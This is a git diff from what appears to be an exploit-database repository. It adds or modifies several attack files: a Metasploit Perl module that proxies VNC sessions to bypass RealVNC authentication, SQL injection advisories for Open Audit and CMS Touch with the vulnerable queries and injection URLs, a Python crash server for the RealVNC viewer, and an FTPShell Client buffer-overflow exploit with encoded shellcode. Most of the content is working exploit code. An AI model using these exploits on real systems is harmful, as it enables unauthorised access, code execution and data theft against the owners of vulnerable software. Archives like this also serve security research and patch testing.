-		'RHOST'   => [ 1, 'HOST', 'The remote VNC target host'],
+		'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
-		'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
+	  },
-	  },
+
-
+	'Refs'            =>
-	'Refs'            =>
+	  [
-	  [
+		['URL', 'http://secunia.com/advisories/20107/']
-		['URL', 'http://secunia.com/advisories/20107/']
+	  ],
-	  ],
+
-
+	'DefaultTarget'  => 0,
-	'DefaultTarget'  => 0,
+	'Targets'        =>
-	'Targets'        =>
+	  [
-	  [
+		[ 'RealVNC' ],
-		[ 'RealVNC' ],
+	  ],
-	  ],
+
-
+	'Keys'           => [ 'realvnc' ],
-	'Keys'           => [ 'realvnc' ],
+
-
+	'DisclosureDate' => 'May 15 2006',
-	'DisclosureDate' => 'May 15 2006',
+  };
-  };
+
-
+sub new
-sub new
+{
-{
+	my $class = shift;
-	my $class = shift;
+	my $self;
-	my $self;
+
-
+	$self = $class->SUPER::new(
-	$self = $class->SUPER::new(
+		{
-		{
+			'Info'     => $info,
-			'Info'     => $info,
+			'Advanced' => $advanced,
-			'Advanced' => $advanced,
+		},
-		},
+		@_);
-		@_);
+
-
+	return $self;
-	return $self;
+}
-}
+
-
+sub Exploit
-sub Exploit
+{
-{
+	my $self = shift;
-	my $self = shift;
+	my $server = IO::Socket::INET->new(
-	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('LHOST'),
-		LocalHost => $self->GetVar('LHOST'),
+		LocalPort => $self->GetVar('LPORT'),
-		LocalPort => $self->GetVar('LPORT'),
+		ReuseAddr => 1,
-		ReuseAddr => 1,
+		Listen    => 1,
-		Listen    => 1,
+		Proto     => 'tcp');
-		Proto     => 'tcp');
+	my $client;
-	my $client;
+
-
+	# Did the listener create fail?
-	# Did the listener create fail?
+	if (not defined($server))
-	if (not defined($server))
+	{
-	{
+		$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
-		$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
+		return;
-		return;
+	}
-	}
+
-
+	if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
-	if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
+    	if (! fork()) {
-    	if (! fork()) {
+        	system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
-        	system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
+        	exit(0);
-        	exit(0);
+    	}		
-    	}		
+	}
-	}
+
-
+	$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
-	$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
+
-
+	while (defined($client = $server->accept()))
-	while (defined($client = $server->accept()))
+	{
-	{
+		$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
-		$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
+	}
-	}
+
-
+	return;
-	return;
+}
-}
+
-
+# Stolen from InjectVNCStage.pm
-# Stolen from InjectVNCStage.pm
+sub HandleVNCClient
-sub HandleVNCClient
+{
-{
+	my $self = shift;
-	my $self = shift;
+	my ($fd) = @{{@_}}{qw/fd/};
-	my ($fd) = @{{@_}}{qw/fd/};
+	my $rhost;
-	my $rhost;
+	my $rport;
-	my $rport;
+
-
+	# Set the remote host information
-	# Set the remote host information
+	($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-	($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+
-
+	# Create a connection to the target system
-	# Create a connection to the target system
+	my $s = Msf::Socket::Tcp->new(
-	my $s = Msf::Socket::Tcp->new(
+		'PeerAddr' => $self->GetVar('RHOST'),
-		'PeerAddr' => $self->GetVar('RHOST'),
+		'PeerPort' => $self->GetVar('RPORT'),
-		'PeerPort' => $self->GetVar('RPORT'),
+		'SSL'      => $self->GetVar('SSL')
-		'SSL'      => $self->GetVar('SSL')
+	);
-	);
+	
-	
+	if ($s->IsError) {
-	if ($s->IsError) {
+		$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
-		$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
+		$fd->Close;
-		$fd->Close;
+		return;
-		return;
+	}
-	}
+	
-	
+	my $res = $s->Recv(-1, 5);
-	my $res = $s->Recv(-1, 5);
+	
-	
+	# Hello from server
-	# Hello from server
+	if ($res !~ /^RFB 003\.008/) {
-	if ($res !~ /^RFB 003\.008/) {
+		$self->PrintLine("[*] The remote VNC service is not vulnerable");
-		$self->PrintLine("[*] The remote VNC service is not vulnerable");
+		$fd->Close;
-		$fd->Close;
+		$s->Close;
-		$s->Close;
+		return;
-		return;
+	}
-	}
+	# Send it to the client
-	# Send it to the client
+	$fd->Send($res);
-	$fd->Send($res);
+	
-	
+	# Hello from client
-	# Hello from client
+	$res = $fd->Recv(-1, 5);
-	$res = $fd->Recv(-1, 5);
+	if ($res !~ /^RFB /) {
-	if ($res !~ /^RFB /) {
+		$self->PrintLine("[*] The local VNC client appears to be broken");
-		$self->PrintLine("[*] The local VNC client appears to be broken");
+		$fd->Close;
-		$fd->Close;
+		$s->Close;
-		$s->Close;
+		return;
-		return;
+	}
-	}
+	# Send it to the server
-	# Send it to the server
+	$s->Send($res);
-	$s->Send($res);
+	
-	
+	# Read the authentication methods from the server
-	# Read the authentication methods from the server
+	$res = $s->Recv(-1, 5);
-	$res = $s->Recv(-1, 5);
+	
-	
+	# Tell the client that the server only supports NULL auth
-	# Tell the client that the server only supports NULL auth
+	$fd->Send("\x01\x01");
-	$fd->Send("\x01\x01");
+	
-	
+	# Start pumping data between the client and server
-	# Start pumping data between the client and server
+	if (! fork()) {
-	if (! fork()) {
+		$self->PrintLine("[*] Proxying data between the connections...");
-		$self->PrintLine("[*] Proxying data between the connections...");
+		$self->VNCProxy($s->Socket, $fd->Socket);
-		$self->VNCProxy($s->Socket, $fd->Socket);
+		exit(0);
-		exit(0);
+	}
-	}
+	return;
-	return;
+}
-}
+
-
+sub VNCProxy {
-sub VNCProxy {
+  my $self = shift;
-  my $self = shift;
+  my $srv = shift;
-  my $srv = shift;
+  my $cli = shift;
-  my $cli = shift;
+
-
+  foreach ($srv, $cli) {
-  foreach ($srv, $cli) {
+    $_->blocking(1);
-    $_->blocking(1);
+    $_->autoflush(1);
-    $_->autoflush(1);
+  }
-  }
+
-
+  my $selector = IO::Select->new($srv, $cli);
-  my $selector = IO::Select->new($srv, $cli);
+
-
+  LOOPER:
-  LOOPER:
+    while(1) {
-    while(1) {
+      my @ready = $selector->can_read;
-      my @ready = $selector->can_read;
+      foreach my $ready (@ready) {
-      foreach my $ready (@ready) {
+        if($ready == $cli) {
-        if($ready == $cli) {
+          my $data;
-          my $data;
+          $cli->recv($data, 8192);
-          $cli->recv($data, 8192);
+          last LOOPER if (! length($data));     
-          last LOOPER if (! length($data));     
+          last LOOPER if(!$srv || !$srv->connected);
-          last LOOPER if(!$srv || !$srv->connected);
+          eval { $srv->send($data); };
-          eval { $srv->send($data); };
+          last LOOPER if $@;
-          last LOOPER if $@;
+        }
-        }
+        elsif($ready == $srv) {
-        elsif($ready == $srv) {
+          my $data;
-          my $data;
+          $srv->recv($data, 8192);
-          $srv->recv($data, 8192);
+          last LOOPER if(!length($data));
-          last LOOPER if(!length($data));
+          last LOOPER if(!$cli || !$cli->connected);
-          last LOOPER if(!$cli || !$cli->connected);
+          eval { $cli->send($data); };
-          eval { $cli->send($data); };
+          last LOOPER if $@;
-          last LOOPER if $@;
+        }
-        }
+      }
-      }
+    }
-    }
+}
-}
+
-
+
-
+1;
-1;
+
-
+
-
+# milw0rm.com [2006-05-15]
 # milw0rm.com [2006-05-15]
--- a/platforms/php/webapps/39150.txt
+++ b/platforms/php/webapps/39150.txt
@ -0,0 +1,55 @@
 #Exploit Title      : Open Audit SQL Injection Vulnerability
 #Exploit Author  : Rahul Pratap Singh
 #Date                 : 2/Jan/2016
 #Home page Link  : https://github.com/jonabbey/open-audit
 #Website      : 0x62626262.wordpress.com
 #Twitter              : @0x62626262
 #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
 1. Description
 "id" field in software_add_license.php is not properly sanitized, that
 leads to SQL Injection Vulnerability.
 "pc" field in delete_system.php, list_viewdef_software_for_system.php and
 system_export.php is not properly sanitized, that leads to SQL Injection
 Vulnerability.
 2. Vulnerable Code:
 software_add_license.php: ( line 12 to 13)
 $sql = "SELECT * from software_register WHERE software_reg_id = '" .
 $_GET["id"] . "'";
 $result = mysql_query($sql, $db);
 delete_system.php: ( line 5 to 10)
  if (isset($_GET['pc'])) {
    $link = mysql_connect($mysql_server, $mysql_user, $mysql_password) or
 die("Could not connect");
    mysql_select_db("$mysql_database") or die("Could not select database");
    $query = "select system_name from system where system_uuid='" .
 $_GET['pc'] . "'";
    $result = mysql_query($query)  or die("Query failed at retrieve system
 name stage.");
 list_viewdef_software_for_system.php: ( line 2 to 3)
 $sql = "SELECT system_os_type FROM system WHERE system_uuid = '" .
 $_REQUEST["pc"] . "'";
 $result = mysql_query($sql, $db);
 system_export.php: ( line 108 to 112)
 if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){
  $pc=$_REQUEST["pc"];
  $_GET["pc"]=$_REQUEST["pc"];
  $sql = "SELECT system_uuid, system_timestamp, system_name FROM system
 WHERE system_uuid = '$pc' OR system_name = '$pc' ";
  $result = mysql_query($sql, $db);
--- a/platforms/php/webapps/39178.txt
+++ b/platforms/php/webapps/39178.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/67377/info
 CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 CMS Touch 2.01 is vulnerable; other versions may also be affected. 
 http://www.example.com/cmstouch/pages.php?Page_ID=[SQL]
--- a/platforms/php/webapps/39179.txt
+++ b/platforms/php/webapps/39179.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/67377/info
 CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 CMS Touch 2.01 is vulnerable; other versions may also be affected. 
 http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]
--- a/platforms/windows/dos/39180.pl
+++ b/platforms/windows/dos/39180.pl
--- a/platforms/windows/dos/39181.py
+++ b/platforms/windows/dos/39181.py
--- a/platforms/windows/dos/39183.py
+++ b/platforms/windows/dos/39183.py
--- a/platforms/windows/dos/7943.py
+++ b/platforms/windows/dos/7943.py
@ -1,53 +1,53 @@
-#!/usr/bin/env python
+#!/usr/bin/env python
-# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
+# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
-#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
+#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
-#
+#
-import socket
+import socket
-
+
-serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-serversocket.bind(('', 5900))
+serversocket.bind(('', 5900))
-serversocket.listen(1)
+serversocket.listen(1)
-
+
-while True:
+while True:
-		clientsocket, clientaddres = serversocket.accept()
+		clientsocket, clientaddres = serversocket.accept()
-
+
-		data = 'RFB 003.008\n'
+		data = 'RFB 003.008\n'
-		clientsocket.sendall(data)
+		clientsocket.sendall(data)
-
+
-		data_cli = clientsocket.recv(1024)
+		data_cli = clientsocket.recv(1024)
-		print data_cli
+		print data_cli
-
+
-		data = '\x01\x01'
+		data = '\x01\x01'
-		clientsocket.sendall(data)
+		clientsocket.sendall(data)
-
+
-		data_cli = clientsocket.recv(1024)
+		data_cli = clientsocket.recv(1024)
-		print repr(data_cli)
+		print repr(data_cli)
-
+
-		data = '\x00\x00\x00\x00'
+		data = '\x00\x00\x00\x00'
-		clientsocket.sendall(data)
+		clientsocket.sendall(data)
-
+
-		data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
+		data = '\x02\xd0\x01\x77\x08\x08\x00\x00\x00\x07\x00\x07\x00\x03\x00\x03\x06\x00\x00\x00\x00\x00\x00\x13\x4c\x69\x6e\x75\x78\x56\x4e\x43\x3a\x20\x2f\x64\x65\x76\x2f\x74\x74\x79\x32'
-
+
-		clientsocket.sendall(data)
+		clientsocket.sendall(data)
-
+
-		data_cli = clientsocket.recv(1024)
+		data_cli = clientsocket.recv(1024)
-		print repr(data_cli)
+		print repr(data_cli)
-
+
-		data_cli = clientsocket.recv(1024)
+		data_cli = clientsocket.recv(1024)
-		print repr(data_cli)
+		print repr(data_cli)
-
+
-		data_cli = clientsocket.recv(1024)
+		data_cli = clientsocket.recv(1024)
-		print repr(data_cli)
+		print repr(data_cli)
-
+
-		data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
+		data='\x00\x00\x00\x03\x00\x03\x00\x03\x00\x08\x00\x07'
-
+
-		data = data + '\x00\x00\xff\xff' #bug
+		data = data + '\x00\x00\xff\xff' #bug
-
+
-		data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
+		data = data + '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\xe7\x7e\x3c\x7e\xe7\xe7'
-
+
-		clientsocket.sendall(data)
+		clientsocket.sendall(data)
-
+
-clientsocket.close()	
+clientsocket.close()	
-serversocket.close()
+serversocket.close()
-
+
-# milw0rm.com [2009-02-02]
+# milw0rm.com [2009-02-02]
--- a/platforms/windows/local/39159.py
+++ b/platforms/windows/local/39159.py
@ -0,0 +1,79 @@
 # Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
 # Google Dork: N/A
 # Date: 2015-01-04
 # Exploit Author: INSECT.B
 #	Twitter : @INSECT.B
 #	Facebook : https://www.facebook.com/B.INSECT00
 #	Blog : http://binsect00.tistory.com
 # Vendor Homepage: www.ftpshell.com
 # Software Link: http://www.ftpshell.com/download.htm
 # Version: 5.24
 # Tested on: Windows7 Ultimate SP1 K x86 
 # CVE : N/A
 """
 [+] Type : Buffer Overflow
 [-]	 ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
 [-]	used to add session to favorites list .
 [+]Crash : input 'A' x 1500 to Session name field
 [-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
 [-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
 [-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
 [-] cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
 [-] 41414141 ??              ???
 """
 import struct
 junk = "A"*460
 junk2 = "\x90"*248
 esp = "\x0B\xD4\xDF\x73" # JMP ESP
 #shellcode
 #CMD : calc.exe
 #encoder : Alpha-mix encoder
 #buffer register : esp 
 sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
 "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
 "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
 "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
 "\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
 "\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
 "\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
 "\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
 "\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
 "\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
 "\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
 "\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
 "\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
 "\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
 "\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
 "\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
 "\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
 "\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
 "\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
 "\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
 "\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
 "\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
 "\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
 "\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
 "\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
 "\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
 "\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
 "\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
 "\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
 "\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
 "\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
 "\x73\x55\x75\x50\x41\x41"
 )
 payload = junk + esp + sc + junk2
 file=open("C:\\shelll","w")
 file.write(payload)
 file.close()